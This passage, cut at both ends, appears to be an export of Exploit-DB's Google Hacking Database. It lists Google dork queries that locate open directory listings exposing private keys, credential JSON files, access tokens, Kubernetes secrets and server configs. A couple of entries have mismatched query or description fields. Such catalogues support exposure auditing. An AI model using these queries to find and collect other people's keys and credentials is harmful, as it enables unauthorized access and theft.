<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8314</id>
<link>https://www.exploit-db.com/ghdb/8314</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;plesk-stat&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;plesk-stat&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Praharsh Kumar Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;plesk-stat&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;plesk-stat&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>6057</id>
<link>https://www.exploit-db.com/ghdb/6057</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;postgresql.conf&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;postgresql.conf&quot;
Description: This Google dork lists out sensitive config data for the
postgresql database on a web server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;postgresql.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;postgresql.conf&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8255</id>
<link>https://www.exploit-db.com/ghdb/8255</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;postman_collection.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;postman_collection.json&quot;
# Files Containing Juicy Info
# Date: 16/10/2023
# Exploit Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;postman_collection.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;postman_collection.json&quot;</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>7552</id>
<link>https://www.exploit-db.com/ghdb/7552</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ppt.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;ppt.html&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ppt.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ppt.html&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7551</id>
<link>https://www.exploit-db.com/ghdb/7551</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;pptx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;pptx&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;pptx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;pptx&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7925</id>
<link>https://www.exploit-db.com/ghdb/7925</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;printenv.pl</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; google-api-php-client
# Files Containing Juicy Info
# Date: 05/02/2022
# Exploit Author: Danish Eqbal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;printenv.pl</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;printenv.pl</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Danish Eqbal</author>
</entry>
<entry>
<id>8198</id>
<link>https://www.exploit-db.com/ghdb/8198</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;private.properties&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;private.properties&quot;
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;private.properties&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;private.properties&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7957</id>
<link>https://www.exploit-db.com/ghdb/7957</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;private_key.pem&quot;</shortDescription>
<textualDescription># Google Dork: *intitle:&quot;index of&quot; &quot;private_key.pem&quot;*
#* Files Containing Juicy Info*
# Date: 6/2/2022
# Exploit Author: Hemdeep Gamit
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;private_key.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;private_key.pem&quot;</querystring>
<edb></edb>
<date>2022-06-27</date>
<author>Hemdeep Gamit</author>
</entry>
<entry>
<id>6084</id>
<link>https://www.exploit-db.com/ghdb/6084</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;privkey.pem&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;privkey.pem&quot;
Description: This google dork lists out secret private keys of a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;privkey.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;privkey.pem&quot;</querystring>
<edb></edb>
<date>2020-05-14</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7298</id>
<link>https://www.exploit-db.com/ghdb/7298</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;production.py&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;production.py&quot;
# Files Containing Juicy Info
# Date:06/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;production.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;production.py&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8197</id>
<link>https://www.exploit-db.com/ghdb/8197</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;profiler&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;profiler&quot;
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;profiler&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;profiler&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7710</id>
<link>https://www.exploit-db.com/ghdb/7710</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;Program files&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;Program files&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;Program files&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;Program files&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>6154</id>
<link>https://www.exploit-db.com/ghdb/6154</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;properties.ini&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;properties.ini&quot;
Description: This google dork lists out sensitive properties of a web server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;properties.ini&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;properties.ini&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7582</id>
<link>https://www.exploit-db.com/ghdb/7582</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;pub&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;pub&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;pub&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;pub&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6053</id>
<link>https://www.exploit-db.com/ghdb/6053</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;queue.log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;queue.log&quot;
# Juicy information and sensitive directories, including usernames, unique
IDs and more.
# Date: 6/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;queue.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;queue.log&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6074</id>
<link>https://www.exploit-db.com/ghdb/6074</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;refresh_token.txt&quot; OR &quot;access_token.txt&quot; OR &quot;jsapi_ticket.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;refresh_token.txt&quot; OR &quot;access_token.txt&quot;
OR &quot;jsapi_ticket.txt&quot;
# Juicy and sensitive information including tokens and more.
# Date: 9/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;refresh_token.txt&quot; OR &quot;access_token.txt&quot; OR &quot;jsapi_ticket.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;refresh_token.txt&quot; OR &quot;access_token.txt&quot; OR &quot;jsapi_ticket.txt&quot;</querystring>
<edb></edb>
<date>2020-05-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8016</id>
<link>https://www.exploit-db.com/ghdb/8016</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;release.sh&quot;</shortDescription>
<textualDescription>#Google dork : intitle:&quot;index of&quot; &quot;release.sh&quot;
#Files Containing Juicy Info
#Date: 28/07/2022
#Exploit Author : Amit Kumar
This dork shows information about configuration services on server.</textualDescription>
<query>intitle:&quot;index of&quot; &quot;release.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;release.sh&quot;</querystring>
<edb></edb>
<date>2022-07-29</date>
<author>Amit Kumar</author>
</entry>
<entry>
<id>7325</id>
<link>https://www.exploit-db.com/ghdb/7325</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;robots.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;robots.txt&quot;
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;robots.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;robots.txt&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7356</id>
<link>https://www.exploit-db.com/ghdb/7356</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;robots.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;robots.txt&quot;
# Files Containing Juicy Info
# Date:29/09/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;robots.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;robots.txt&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7377</id>
<link>https://www.exploit-db.com/ghdb/7377</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;schema.graphql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;schema.graphql&quot;
# Files Containing Juicy Info
# Date:18/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;schema.graphql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;schema.graphql&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7437</id>
<link>https://www.exploit-db.com/ghdb/7437</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;schema.mysql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;schema.mysql&quot;
# Files Containing Juicy Info
# Date:12/10/2021
# Exploit Author: AFFAN AHMED</textualDescription>
<query>intitle:&quot;index of&quot; &quot;schema.mysql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;schema.mysql&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>AFFAN AHMED</author>
</entry>
<entry>
<id>7708</id>
<link>https://www.exploit-db.com/ghdb/7708</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;Screenshot&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;Screenshot&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;Screenshot&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;Screenshot&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7607</id>
<link>https://www.exploit-db.com/ghdb/7607</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;script.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;script.js&quot;
# Files Containing Juicy Info
# Date:03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;script.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;script.js&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6025</id>
<link>https://www.exploit-db.com/ghdb/6025</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;secret.js&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;secret.js&quot;
Description: This google dork lists out sites secret javascript files for a
web server.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;secret.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;secret.js&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8331</id>
<link>https://www.exploit-db.com/ghdb/8331</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;secret.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;secret.txt&quot;
# Files Containing Juicy Info
# Date: 08/11/2023
# Exploit: Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;secret.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;secret.txt&quot;</querystring>
<edb></edb>
<date>2023-11-08</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>6821</id>
<link>https://www.exploit-db.com/ghdb/6821</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;secret.yaml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;secret.yaml&quot;
# Description: K8s secret objects containing private data in base64 encoded
format (username, passwords, certificates, private keys, etc)
# Exploit author: Vladimir Remenar
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;secret.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;secret.yaml&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Vladimir Remenar</author>
</entry>
<entry>
<id>6038</id>
<link>https://www.exploit-db.com/ghdb/6038</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;secrets.py&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;secrets.py&quot;
Description: This google dork lists secret python files in a webserver.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;secrets.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;secrets.py&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5798</id>
<link>https://www.exploit-db.com/ghdb/5798</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;secrets.yml&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure and sensitve secrets.yml metadata
stored in YML format.
Google Dork Query: *intitle:&quot;index of&quot; &quot;secrets.yml&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;secrets.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;secrets.yml&quot;</querystring>
<edb></edb>
<date>2020-03-17</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>6036</id>
<link>https://www.exploit-db.com/ghdb/6036</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;security.json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;security.json&quot;
Description: This google dork lists out sensitive security logs in web
servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;security.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;security.json&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6178</id>
<link>https://www.exploit-db.com/ghdb/6178</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;security.php&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;security.php&quot;
Description: This google dork lists out sensitive security logs in web
servers.
Author: Abhinav Porwal
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;security.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;security.php&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>7515</id>
<link>https://www.exploit-db.com/ghdb/7515</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;server.log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;server.log&quot;
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>intitle:&quot;index of&quot; &quot;server.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;server.log&quot;</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>7504</id>
<link>https://www.exploit-db.com/ghdb/7504</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;server.properties&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;server.properties&quot;
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Tanvir Rayhan</textualDescription>
<query>intitle:&quot;index of&quot; &quot;server.properties&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;server.properties&quot;</querystring>
<edb></edb>
<date>2021-10-27</date>
<author>Tanvir Rayhan</author>
</entry>
<entry>
<id>6655</id>
<link>https://www.exploit-db.com/ghdb/6655</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;service-Account-Credentials.json&quot; | &quot;creds.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;service-Account-Credentials.json&quot; | &quot;creds.json&quot;
# Sensitive directories containing private keys, private key IDs, etc..
# Date: 5/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;service-Account-Credentials.json&quot; | &quot;creds.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;service-Account-Credentials.json&quot; | &quot;creds.json&quot;</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7641</id>
<link>https://www.exploit-db.com/ghdb/7641</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;service.pwd&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;service.pwd&quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;service.pwd&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;service.pwd&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5778</id>
<link>https://www.exploit-db.com/ghdb/5778</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;settings.py&quot;</shortDescription>
<textualDescription>files containing juicy info:
intitle:&quot;index of&quot; &quot;settings.py&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;settings.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;settings.py&quot;</querystring>
<edb></edb>
<date>2020-03-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6003</id>
<link>https://www.exploit-db.com/ghdb/6003</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;settings.yaml&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;settings.yaml&quot;
Description: This Google dork lists out sensitive configuration files
stored in the &quot;settings.yaml&quot; for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;settings.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;settings.yaml&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5796</id>
<link>https://www.exploit-db.com/ghdb/5796</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;settings.yml&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure and sensitve settings.yml metadata
stored in YML format.
Google Dork Query: *intitle:&quot;index of&quot; &quot;settings.yml&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;settings.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;settings.yml&quot;</querystring>
<edb></edb>
<date>2020-03-17</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>8011</id>
<link>https://www.exploit-db.com/ghdb/8011</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;setup.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;setup.sh&quot;
# Files Containing Juicy Info
# Date:27/07/2022
# Exploit Author: Yashwant Shastri</textualDescription>
<query>intitle:&quot;index of&quot; &quot;setup.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;setup.sh&quot;</querystring>
<edb></edb>
<date>2022-07-27</date>
<author>Yashwant Shastri</author>
</entry>
<entry>
<id>7393</id>
<link>https://www.exploit-db.com/ghdb/7393</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;sftp.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;sftp.json&quot;
# Files Containing Juicy Info
# Date:04/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of&quot; &quot;sftp.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;sftp.json&quot;</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7642</id>
<link>https://www.exploit-db.com/ghdb/7642</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;shtml.dll &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;shtml.dll &quot;
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;shtml.dll &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;shtml.dll &quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8351</id>
<link>https://www.exploit-db.com/ghdb/8351</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;site backup&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;site backup&quot;
# Files Containing Juicy Info
# Date: 20/11/2023
# Exploit: Nyambi Blaise</textualDescription>
<query>New GHDB Submission: Site Backup Index Exposure</query>
<querystring>https://www.google.com/search?q=New GHDB Submission: Site Backup Index Exposure</querystring>
<edb></edb>
<date>2023-11-20</date>
<author>Nyambi Blaise</author>
</entry>
<entry>
<id>7553</id>
<link>https://www.exploit-db.com/ghdb/7553</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;slides-ppt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;slides-ppt&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;slides-ppt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;slides-ppt&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5743</id>
<link>https://www.exploit-db.com/ghdb/5743</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;smtp.log&quot;</shortDescription>
<textualDescription>*Dork:* intitle:&quot;index of&quot; &quot;smtp.log&quot;
*Description:*
It finds SMTP logs
*Author:* Magrabur Alam Sofily
www.linkedin.com/in/magrabur-sofily
@masofily
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;smtp.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;smtp.log&quot;</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>Magrabur Alam Sofily</author>
</entry>
<entry>
<id>7337</id>
<link>https://www.exploit-db.com/ghdb/7337</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;sourcecode&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;sourcecode&quot;
# Files Containing Juicy Info
# Date:27/09/2021
# Exploit Author: ethicalsubbu</textualDescription>
<query>intitle:&quot;index of&quot; &quot;sourcecode&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;sourcecode&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>ethicalsubbu</author>
</entry>
<entry>
<id>7587</id>
<link>https://www.exploit-db.com/ghdb/7587</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Squid-cache&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;Squid-cache&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Squid-cache&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Squid-cache&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5646</id>
<link>https://www.exploit-db.com/ghdb/5646</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ssh.yml&quot;</shortDescription>
<textualDescription>Files containing password:
intitle:&quot;index of&quot; &quot;ssh.yml&quot;
intitle:&quot;index of&quot; &quot;database-old.yml&quot;
intitle:&quot;index of&quot; &quot;configuration.yml&quot;
intitle:&quot;index of&quot; &quot;database.yml&quot;
intitle:&quot;index of&quot; &quot;ftp.yml&quot;
Author : Ismail Tasdelen
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ssh.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ssh.yml&quot;</querystring>
<edb></edb>
<date>2019-11-12</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>7039</id>
<link>https://www.exploit-db.com/ghdb/7039</link>
<category>Files Containing Juicy Info</category>
